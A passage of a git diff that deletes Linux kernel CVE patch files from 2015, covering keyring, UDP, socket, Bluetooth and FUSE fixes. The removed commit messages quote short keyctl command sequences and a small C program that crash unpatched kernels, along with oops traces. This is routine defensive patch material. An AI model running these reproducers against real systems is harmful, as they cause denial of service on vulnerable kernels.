---- a/security/keys/keyctl.c
-+++ b/security/keys/keyctl.c
-@@ -751,16 +751,16 @@ long keyctl_read_key(key_serial_t keyid, char __user *buffer, size_t buflen)
- 
- 	/* the key is probably readable - now try to read it */
- can_read_key:
--	ret = key_validate(key);
--	if (ret == 0) {
--		ret = -EOPNOTSUPP;
--		if (key->type->read) {
--			/* read the data with the semaphore held (since we
--			 * might sleep) */
--			down_read(&key->sem);
-+	ret = -EOPNOTSUPP;
-+	if (key->type->read) {
-+		/* Read the data with the semaphore held (since we might sleep)
-+		 * to protect against the key being updated or revoked.
-+		 */
-+		down_read(&key->sem);
-+		ret = key_validate(key);
-+		if (ret == 0)
- 			ret = key->type->read(key, buffer, buflen);
--			up_read(&key->sem);
--		}
-+		up_read(&key->sem);
- 	}
- 
- error2:
diff --git a/Patches/Linux_CVEs/CVE-2015-7872/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-7872/ANY/0001.patch
deleted file mode 100644
index 7fcac29f..00000000
--- a/Patches/Linux_CVEs/CVE-2015-7872/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From f05819df10d7b09f6d1eb6f8534a8f68e5a4fe61 Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Thu, 15 Oct 2015 17:21:37 +0100
-Subject: KEYS: Fix crash when attempt to garbage collect an uninstantiated
- keyring
-
-The following sequence of commands:
-
-    i=`keyctl add user a a @s`
-    keyctl request2 keyring foo bar @t
-    keyctl unlink $i @s
-
-tries to invoke an upcall to instantiate a keyring if one doesn't already
-exist by that name within the user's keyring set.  However, if the upcall
-fails, the code sets keyring->type_data.reject_error to -ENOKEY or some
-other error code.  When the key is garbage collected, the key destroy
-function is called unconditionally and keyring_destroy() uses list_empty()
-on keyring->type_data.link - which is in a union with reject_error.
-Subsequently, the kernel tries to unlink the keyring from the keyring names
-list - which oopses like this:
-
-	BUG: unable to handle kernel paging request at 00000000ffffff8a
-	IP: [<ffffffff8126e051>] keyring_destroy+0x3d/0x88
-	...
-	Workqueue: events key_garbage_collector
-	...
-	RIP: 0010:[<ffffffff8126e051>] keyring_destroy+0x3d/0x88
-	RSP: 0018:ffff88003e2f3d30  EFLAGS: 00010203
-	RAX: 00000000ffffff82 RBX: ffff88003bf1a900 RCX: 0000000000000000
-	RDX: 0000000000000000 RSI: 000000003bfc6901 RDI: ffffffff81a73a40
-	RBP: ffff88003e2f3d38 R08: 0000000000000152 R09: 0000000000000000
-	R10: ffff88003e2f3c18 R11: 000000000000865b R12: ffff88003bf1a900
-	R13: 0000000000000000 R14: ffff88003bf1a908 R15: ffff88003e2f4000
-	...
-	CR2: 00000000ffffff8a CR3: 000000003e3ec000 CR4: 00000000000006f0
-	...
-	Call Trace:
-	 [<ffffffff8126c756>] key_gc_unused_keys.constprop.1+0x5d/0x10f
-	 [<ffffffff8126ca71>] key_garbage_collector+0x1fa/0x351
-	 [<ffffffff8105ec9b>] process_one_work+0x28e/0x547
-	 [<ffffffff8105fd17>] worker_thread+0x26e/0x361
-	 [<ffffffff8105faa9>] ? rescuer_thread+0x2a8/0x2a8
-	 [<ffffffff810648ad>] kthread+0xf3/0xfb
-	 [<ffffffff810647ba>] ? kthread_create_on_node+0x1c2/0x1c2
-	 [<ffffffff815f2ccf>] ret_from_fork+0x3f/0x70
-	 [<ffffffff810647ba>] ? kthread_create_on_node+0x1c2/0x1c2
-
-Note the value in RAX.  This is a 32-bit representation of -ENOKEY.
-
-The solution is to only call ->destroy() if the key was successfully
-instantiated.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-Tested-by: Dmitry Vyukov <dvyukov@google.com>
----
- security/keys/gc.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/security/keys/gc.c b/security/keys/gc.c
-index 39eac1f..addf060 100644
---- a/security/keys/gc.c
-+++ b/security/keys/gc.c
-@@ -134,8 +134,10 @@ static noinline void key_gc_unused_keys(struct list_head *keys)
- 		kdebug("- %u", key->serial);
- 		key_check(key);
- 
--		/* Throw away the key data */
--		if (key->type->destroy)
-+		/* Throw away the key data if the key is instantiated */
-+		if (test_bit(KEY_FLAG_INSTANTIATED, &key->flags) &&
-+		    !test_bit(KEY_FLAG_NEGATIVE, &key->flags) &&
-+		    key->type->destroy)
- 			key->type->destroy(key);
- 
- 		security_key_free(key);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8019/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2015-8019/3.10/0001.patch
deleted file mode 100644
index 5dd1912b..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8019/3.10/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 813658e0c448f2f5fb3301762076ba5e0f61411c Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Wed, 30 Dec 2015 08:51:12 -0500
-Subject: udp: properly support MSG_PEEK with truncated buffers
-
-Backport of this upstream commit into stable kernels :
-89c22d8c3b27 ("net: Fix skb csum races when peeking")
-exposed a bug in udp stack vs MSG_PEEK support, when user provides
-a buffer smaller than skb payload.
-
-In this case,
-skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr),
-                                 msg->msg_iov);
-returns -EFAULT.
-
-This bug does not happen in upstream kernels since Al Viro did a great
-job to replace this into :
-skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg);
-This variant is safe vs short buffers.
-
-For the time being, instead reverting Herbert Xu patch and add back
-skb->ip_summed invalid changes, simply store the result of
-udp_lib_checksum_complete() so that we avoid computing the checksum a
-second time, and avoid the problematic
-skb_copy_and_csum_datagram_iovec() call.
-
-This patch can be applied on recent kernels as it avoids a double
-checksumming, then backported to stable kernels as a bug fix.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Acked-by: Herbert Xu <herbert@gondor.apana.org.au>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-[d-cagle@codeaurora.org: Resolve trivial merge conflicts]
-Git-repo: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
-Git-commit: 197c949e7798fbf28cfadc69d9ca0c2abbf93191
-Change-Id: I70f19a362f627bd2d9d8e10e31bbcdb4b0600792
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- net/ipv4/udp.c | 6 ++++--
- net/ipv6/udp.c | 6 ++++--
- 2 files changed, 8 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
-index 463710f..23d991a 100644
---- a/net/ipv4/udp.c
-+++ b/net/ipv4/udp.c
-@@ -1215,6 +1215,7 @@ int udp_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	bool slow;
- 
- 	if (flags & MSG_ERRQUEUE)
-@@ -1240,11 +1241,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr),
- 					      msg->msg_iov, copied);
- 	else {
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 2adb069..d689b25 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -370,6 +370,7 @@ int udpv6_recvmsg(struct kiocb *iocb, struct sock *sk,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	int is_udp4;
- 	bool slow;
- 
-@@ -401,11 +402,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr),
- 					      msg->msg_iov, copied);
- 	else {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8019/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2015-8019/3.18/0002.patch
deleted file mode 100644
index efb1aaf5..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8019/3.18/0002.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From f1c121b78e68c03f7fe5e9fa7319e53ad29392f3 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Wed, 30 Dec 2015 08:51:12 -0500
-Subject: udp: properly support MSG_PEEK with truncated buffers
-
-Backport of this upstream commit into stable kernels :
-89c22d8c3b27 ("net: Fix skb csum races when peeking")
-exposed a bug in udp stack vs MSG_PEEK support, when user provides
-a buffer smaller than skb payload.
-
-In this case,
-skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr),
-                                 msg->msg_iov);
-returns -EFAULT.
-
-This bug does not happen in upstream kernels since Al Viro did a great
-job to replace this into :
-skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg);
-This variant is safe vs short buffers.
-
-For the time being, instead reverting Herbert Xu patch and add back
-skb->ip_summed invalid changes, simply store the result of
-udp_lib_checksum_complete() so that we avoid computing the checksum a
-second time, and avoid the problematic
-skb_copy_and_csum_datagram_iovec() call.
-
-This patch can be applied on recent kernels as it avoids a double
-checksumming, then backported to stable kernels as a bug fix.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Acked-by: Herbert Xu <herbert@gondor.apana.org.au>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-[d-cagle@codeaurora.org: Resolve trivial merge conflicts]
-Git-repo: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
-Git-commit: 197c949e7798fbf28cfadc69d9ca0c2abbf93191
-Change-Id: I70f19a362f627bd2d9d8e10e31bbcdb4b0600792
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- net/ipv4/udp.c | 6 ++++--
- net/ipv6/udp.c | 6 ++++--
- 2 files changed, 8 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
-index 44a7c83..9f8f9ae5 100644
---- a/net/ipv4/udp.c
-+++ b/net/ipv4/udp.c
-@@ -1258,6 +1258,7 @@ int udp_recvmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	bool slow;
- 
- 	if (flags & MSG_ERRQUEUE)
-@@ -1283,11 +1284,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr),
- 					      msg->msg_iov, copied);
- 	else {
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 9786416..c48441d 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -388,6 +388,7 @@ int udpv6_recvmsg(struct kiocb *iocb, struct sock *sk,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	int is_udp4;
- 	bool slow;
- 
-@@ -419,11 +420,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_iovec(skb, sizeof(struct udphdr),
- 					      msg->msg_iov, copied);
- 	else {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8019/4.3/0003.patch b/Patches/Linux_CVEs/CVE-2015-8019/4.3/0003.patch
deleted file mode 100644
index 1d12eaa4..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8019/4.3/0003.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 197c949e7798fbf28cfadc69d9ca0c2abbf93191 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Wed, 30 Dec 2015 08:51:12 -0500
-Subject: udp: properly support MSG_PEEK with truncated buffers
-
-Backport of this upstream commit into stable kernels :
-89c22d8c3b27 ("net: Fix skb csum races when peeking")
-exposed a bug in udp stack vs MSG_PEEK support, when user provides
-a buffer smaller than skb payload.
-
-In this case,
-skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr),
-                                 msg->msg_iov);
-returns -EFAULT.
-
-This bug does not happen in upstream kernels since Al Viro did a great
-job to replace this into :
-skb_copy_and_csum_datagram_msg(skb, sizeof(struct udphdr), msg);
-This variant is safe vs short buffers.
-
-For the time being, instead reverting Herbert Xu patch and add back
-skb->ip_summed invalid changes, simply store the result of
-udp_lib_checksum_complete() so that we avoid computing the checksum a
-second time, and avoid the problematic
-skb_copy_and_csum_datagram_iovec() call.
-
-This patch can be applied on recent kernels as it avoids a double
-checksumming, then backported to stable kernels as a bug fix.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Acked-by: Herbert Xu <herbert@gondor.apana.org.au>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv4/udp.c | 6 ++++--
- net/ipv6/udp.c | 6 ++++--
- 2 files changed, 8 insertions(+), 4 deletions(-)
-
-diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
-index 8841e98..ac14ae4 100644
---- a/net/ipv4/udp.c
-+++ b/net/ipv4/udp.c
-@@ -1271,6 +1271,7 @@ int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	bool slow;
- 
- 	if (flags & MSG_ERRQUEUE)
-@@ -1296,11 +1297,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
- 					    msg, copied);
- 	else {
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 9da3287..00775ee 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -402,6 +402,7 @@ int udpv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
- 	int peeked, off = 0;
- 	int err;
- 	int is_udplite = IS_UDPLITE(sk);
-+	bool checksum_valid = false;
- 	int is_udp4;
- 	bool slow;
- 
-@@ -433,11 +434,12 @@ try_again:
- 	 */
- 
- 	if (copied < ulen || UDP_SKB_CB(skb)->partial_cov) {
--		if (udp_lib_checksum_complete(skb))
-+		checksum_valid = !udp_lib_checksum_complete(skb);
-+		if (!checksum_valid)
- 			goto csum_copy_err;
- 	}
- 
--	if (skb_csum_unnecessary(skb))
-+	if (checksum_valid || skb_csum_unnecessary(skb))
- 		err = skb_copy_datagram_msg(skb, sizeof(struct udphdr),
- 					    msg, copied);
- 	else {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8539/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8539/ANY/0001.patch
deleted file mode 100644
index f86c3c40..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8539/ANY/0001.patch
+++ /dev/null
@@ -1,125 +0,0 @@
-From 096fe9eaea40a17e125569f9e657e34cdb6d73bd Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Tue, 24 Nov 2015 21:36:31 +0000
-Subject: KEYS: Fix handling of stored error in a negatively instantiated user
- key
-
-If a user key gets negatively instantiated, an error code is cached in the
-payload area.  A negatively instantiated key may be then be positively
-instantiated by updating it with valid data.  However, the ->update key
-type method must be aware that the error code may be there.
-
-The following may be used to trigger the bug in the user key type:
-
-    keyctl request2 user user "" @u
-    keyctl add user user "a" @u
-
-which manifests itself as:
-
-	BUG: unable to handle kernel paging request at 00000000ffffff8a
-	IP: [<ffffffff810a376f>] __call_rcu.constprop.76+0x1f/0x280 kernel/rcu/tree.c:3046
-	PGD 7cc30067 PUD 0
-	Oops: 0002 [#1] SMP
-	Modules linked in:
-	CPU: 3 PID: 2644 Comm: a.out Not tainted 4.3.0+ #49
-	Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-	task: ffff88003ddea700 ti: ffff88003dd88000 task.ti: ffff88003dd88000
-	RIP: 0010:[<ffffffff810a376f>]  [<ffffffff810a376f>] __call_rcu.constprop.76+0x1f/0x280
-	 [<ffffffff810a376f>] __call_rcu.constprop.76+0x1f/0x280 kernel/rcu/tree.c:3046
-	RSP: 0018:ffff88003dd8bdb0  EFLAGS: 00010246
-	RAX: 00000000ffffff82 RBX: 0000000000000000 RCX: 0000000000000001
-	RDX: ffffffff81e3fe40 RSI: 0000000000000000 RDI: 00000000ffffff82
-	RBP: ffff88003dd8bde0 R08: ffff88007d2d2da0 R09: 0000000000000000
-	R10: 0000000000000000 R11: ffff88003e8073c0 R12: 00000000ffffff82
-	R13: ffff88003dd8be68 R14: ffff88007d027600 R15: ffff88003ddea700
-	FS:  0000000000b92880(0063) GS:ffff88007fd00000(0000) knlGS:0000000000000000
-	CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
-	CR2: 00000000ffffff8a CR3: 000000007cc5f000 CR4: 00000000000006e0
-	Stack:
-	 ffff88003dd8bdf0 ffffffff81160a8a 0000000000000000 00000000ffffff82
-	 ffff88003dd8be68 ffff88007d027600 ffff88003dd8bdf0 ffffffff810a39e5
-	 ffff88003dd8be20 ffffffff812a31ab ffff88007d027600 ffff88007d027620
-	Call Trace:
-	 [<ffffffff810a39e5>] kfree_call_rcu+0x15/0x20 kernel/rcu/tree.c:3136
-	 [<ffffffff812a31ab>] user_update+0x8b/0xb0 security/keys/user_defined.c:129
-	 [<     inline     >] __key_update security/keys/key.c:730
-	 [<ffffffff8129e5c1>] key_create_or_update+0x291/0x440 security/keys/key.c:908
-	 [<     inline     >] SYSC_add_key security/keys/keyctl.c:125
-	 [<ffffffff8129fc21>] SyS_add_key+0x101/0x1e0 security/keys/keyctl.c:60
-	 [<ffffffff8185f617>] entry_SYSCALL_64_fastpath+0x12/0x6a arch/x86/entry/entry_64.S:185
-
-Note the error code (-ENOKEY) in EDX.
-
-A similar bug can be tripped by:
-
-    keyctl request2 trusted user "" @u
-    keyctl add trusted user "a" @u
-
-This should also affect encrypted keys - but that has to be correctly
-parameterised or it will fail with EINVAL before getting to the bit that
-will crashes.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Signed-off-by: David Howells <dhowells@redhat.com>
-Acked-by: Mimi Zohar <zohar@linux.vnet.ibm.com>
-Signed-off-by: James Morris <james.l.morris@oracle.com>
----
- security/keys/encrypted-keys/encrypted.c | 2 ++
- security/keys/trusted.c                  | 5 ++++-
- security/keys/user_defined.c             | 5 ++++-
- 3 files changed, 10 insertions(+), 2 deletions(-)
-
-diff --git a/security/keys/encrypted-keys/encrypted.c b/security/keys/encrypted-keys/encrypted.c
-index 927db9f..696ccfa 100644
---- a/security/keys/encrypted-keys/encrypted.c
-+++ b/security/keys/encrypted-keys/encrypted.c
-@@ -845,6 +845,8 @@ static int encrypted_update(struct key *key, struct key_preparsed_payload *prep)
- 	size_t datalen = prep->datalen;
- 	int ret = 0;
- 
-+	if (test_bit(KEY_FLAG_NEGATIVE, &key->flags))
-+		return -ENOKEY;
- 	if (datalen <= 0 || datalen > 32767 || !prep->data)
- 		return -EINVAL;
- 
-diff --git a/security/keys/trusted.c b/security/keys/trusted.c
-index 903dace..16dec53 100644
---- a/security/keys/trusted.c
-+++ b/security/keys/trusted.c
-@@ -1007,13 +1007,16 @@ static void trusted_rcu_free(struct rcu_head *rcu)
-  */
- static int trusted_update(struct key *key, struct key_preparsed_payload *prep)
- {
--	struct trusted_key_payload *p = key->payload.data[0];
-+	struct trusted_key_payload *p;
- 	struct trusted_key_payload *new_p;
- 	struct trusted_key_options *new_o;
- 	size_t datalen = prep->datalen;
- 	char *datablob;
- 	int ret = 0;
- 
-+	if (test_bit(KEY_FLAG_NEGATIVE, &key->flags))
-+		return -ENOKEY;
-+	p = key->payload.data[0];
- 	if (!p->migratable)
- 		return -EPERM;
- 	if (datalen <= 0 || datalen > 32767 || !prep->data)
-diff --git a/security/keys/user_defined.c b/security/keys/user_defined.c
-index 28cb30f..8705d79 100644
---- a/security/keys/user_defined.c
-+++ b/security/keys/user_defined.c
-@@ -120,7 +120,10 @@ int user_update(struct key *key, struct key_preparsed_payload *prep)
- 
- 	if (ret == 0) {
- 		/* attach the new data, displacing the old */
--		zap = key->payload.data[0];
-+		if (!test_bit(KEY_FLAG_NEGATIVE, &key->flags))
-+			zap = key->payload.data[0];
-+		else
-+			zap = NULL;
- 		rcu_assign_keypointer(key, upayload);
- 		key->expiry = 0;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8543/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8543/ANY/0001.patch
deleted file mode 100644
index f66c0fb6..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8543/ANY/0001.patch
+++ /dev/null
@@ -1,139 +0,0 @@
-From 79462ad02e861803b3840cc782248c7359451cd9 Mon Sep 17 00:00:00 2001
-From: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Date: Mon, 14 Dec 2015 22:03:39 +0100
-Subject: net: add validation for the socket syscall protocol argument
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-郭永刚 reported that one could simply crash the kernel as root by
-using a simple program:
-
-	int socket_fd;
-	struct sockaddr_in addr;
-	addr.sin_port = 0;
-	addr.sin_addr.s_addr = INADDR_ANY;
-	addr.sin_family = 10;
-
-	socket_fd = socket(10,3,0x40000000);
-	connect(socket_fd , &addr,16);
-
-AF_INET, AF_INET6 sockets actually only support 8-bit protocol
-identifiers. inet_sock's skc_protocol field thus is sized accordingly,
-thus larger protocol identifiers simply cut off the higher bits and
-store a zero in the protocol fields.
-
-This could lead to e.g. NULL function pointer because as a result of
-the cut off inet_num is zero and we call down to inet_autobind, which
-is NULL for raw sockets.
-
-kernel: Call Trace:
-kernel:  [<ffffffff816db90e>] ? inet_autobind+0x2e/0x70
-kernel:  [<ffffffff816db9a4>] inet_dgram_connect+0x54/0x80
-kernel:  [<ffffffff81645069>] SYSC_connect+0xd9/0x110
-kernel:  [<ffffffff810ac51b>] ? ptrace_notify+0x5b/0x80
-kernel:  [<ffffffff810236d8>] ? syscall_trace_enter_phase2+0x108/0x200
-kernel:  [<ffffffff81645e0e>] SyS_connect+0xe/0x10
-kernel:  [<ffffffff81779515>] tracesys_phase2+0x84/0x89
-
-I found no particular commit which introduced this problem.
-
-CVE: CVE-2015-8543
-Cc: Cong Wang <cwang@twopensource.com>
-Reported-by: 郭永刚 <guoyonggang@360.cn>
-Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- include/net/sock.h     | 1 +
- net/ax25/af_ax25.c     | 3 +++
- net/decnet/af_decnet.c | 3 +++
- net/ipv4/af_inet.c     | 3 +++
- net/ipv6/af_inet6.c    | 3 +++
- net/irda/af_irda.c     | 3 +++
- 6 files changed, 16 insertions(+)
-
-diff --git a/include/net/sock.h b/include/net/sock.h
-index eaef414..c4205e0 100644
---- a/include/net/sock.h
-+++ b/include/net/sock.h
-@@ -403,6 +403,7 @@ struct sock {
- 				sk_no_check_rx : 1,
- 				sk_userlocks : 4,
- 				sk_protocol  : 8,
-+#define SK_PROTOCOL_MAX U8_MAX
- 				sk_type      : 16;
- 	kmemcheck_bitfield_end(flags);
- 	int			sk_wmem_queued;
-diff --git a/net/ax25/af_ax25.c b/net/ax25/af_ax25.c
-index ae3a47f..fbd0acf 100644
---- a/net/ax25/af_ax25.c
-+++ b/net/ax25/af_ax25.c
-@@ -805,6 +805,9 @@ static int ax25_create(struct net *net, struct socket *sock, int protocol,
- 	struct sock *sk;
- 	ax25_cb *ax25;
- 
-+	if (protocol < 0 || protocol > SK_PROTOCOL_MAX)
-+		return -EINVAL;
-+
- 	if (!net_eq(net, &init_net))
- 		return -EAFNOSUPPORT;
- 
-diff --git a/net/decnet/af_decnet.c b/net/decnet/af_decnet.c
-index eebf5ac..13d6b1a 100644
---- a/net/decnet/af_decnet.c
-+++ b/net/decnet/af_decnet.c
-@@ -678,6 +678,9 @@ static int dn_create(struct net *net, struct socket *sock, int protocol,
- {
- 	struct sock *sk;
- 
-+	if (protocol < 0 || protocol > SK_PROTOCOL_MAX)
-+		return -EINVAL;
-+
- 	if (!net_eq(net, &init_net))
- 		return -EAFNOSUPPORT;
- 
-diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
-index 11c4ca1..5c5db66 100644
---- a/net/ipv4/af_inet.c
-+++ b/net/ipv4/af_inet.c
-@@ -257,6 +257,9 @@ static int inet_create(struct net *net, struct socket *sock, int protocol,
- 	int try_loading_module = 0;
- 	int err;
- 
-+	if (protocol < 0 || protocol >= IPPROTO_MAX)
-+		return -EINVAL;
-+
- 	sock->state = SS_UNCONNECTED;
- 
- 	/* Look for the requested type/protocol pair. */
-diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
-index 8ec0df7..9f5137c 100644
---- a/net/ipv6/af_inet6.c
-+++ b/net/ipv6/af_inet6.c
-@@ -109,6 +109,9 @@ static int inet6_create(struct net *net, struct socket *sock, int protocol,
- 	int try_loading_module = 0;
- 	int err;
- 
-+	if (protocol < 0 || protocol >= IPPROTO_MAX)
-+		return -EINVAL;
-+
- 	/* Look for the requested type/protocol pair. */
- lookup_protocol:
- 	err = -ESOCKTNOSUPPORT;
-diff --git a/net/irda/af_irda.c b/net/irda/af_irda.c
-index e6aa48b..923abd6 100644
---- a/net/irda/af_irda.c
-+++ b/net/irda/af_irda.c
-@@ -1086,6 +1086,9 @@ static int irda_create(struct net *net, struct socket *sock, int protocol,
- 	struct sock *sk;
- 	struct irda_sock *self;
- 
-+	if (protocol < 0 || protocol > SK_PROTOCOL_MAX)
-+		return -EINVAL;
-+
- 	if (net != &init_net)
- 		return -EAFNOSUPPORT;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8575/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8575/ANY/0001.patch
deleted file mode 100644
index fc4f4b88..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8575/ANY/0001.patch
+++ /dev/null
@@ -1,27 +0,0 @@
-From 5233252fce714053f0151680933571a2da9cbfb4 Mon Sep 17 00:00:00 2001
-From: "David S. Miller" <davem@davemloft.net>
-Date: Tue, 15 Dec 2015 15:39:08 -0500
-Subject: bluetooth: Validate socket address length in sco_sock_bind().
-
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/bluetooth/sco.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
-index fe12966..f52bcbf 100644
---- a/net/bluetooth/sco.c
-+++ b/net/bluetooth/sco.c
-@@ -526,6 +526,9 @@ static int sco_sock_bind(struct socket *sock, struct sockaddr *addr,
- 	if (!addr || addr->sa_family != AF_BLUETOOTH)
- 		return -EINVAL;
- 
-+	if (addr_len < sizeof(struct sockaddr_sco))
-+		return -EINVAL;
-+
- 	lock_sock(sk);
- 
- 	if (sk->sk_state != BT_OPEN) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-8785/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-8785/ANY/0001.patch
deleted file mode 100644
index a89c4805..00000000
--- a/Patches/Linux_CVEs/CVE-2015-8785/ANY/0001.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-From 3ca8138f014a913f98e6ef40e939868e1e9ea876 Mon Sep 17 00:00:00 2001
-From: Roman Gushchin <klamm@yandex-team.ru>
-Date: Mon, 12 Oct 2015 16:33:44 +0300
-Subject: fuse: break infinite loop in fuse_fill_write_pages()
-
-I got a report about unkillable task eating CPU. Further
-investigation shows, that the problem is in the fuse_fill_write_pages()
-function. If iov's first segment has zero length, we get an infinite
-loop, because we never reach iov_iter_advance() call.
-
-Fix this by calling iov_iter_advance() before repeating an attempt to
-copy data from userspace.
-
-A similar problem is described in 124d3b7041f ("fix writev regression:
-pan hanging unkillable and un-straceable"). If zero-length segmend
-is followed by segment with invalid address,
-iov_iter_fault_in_readable() checks only first segment (zero-length),
-iov_iter_copy_from_user_atomic() skips it, fails at second and
-returns zero -> goto again without skipping zero-length segment.
-
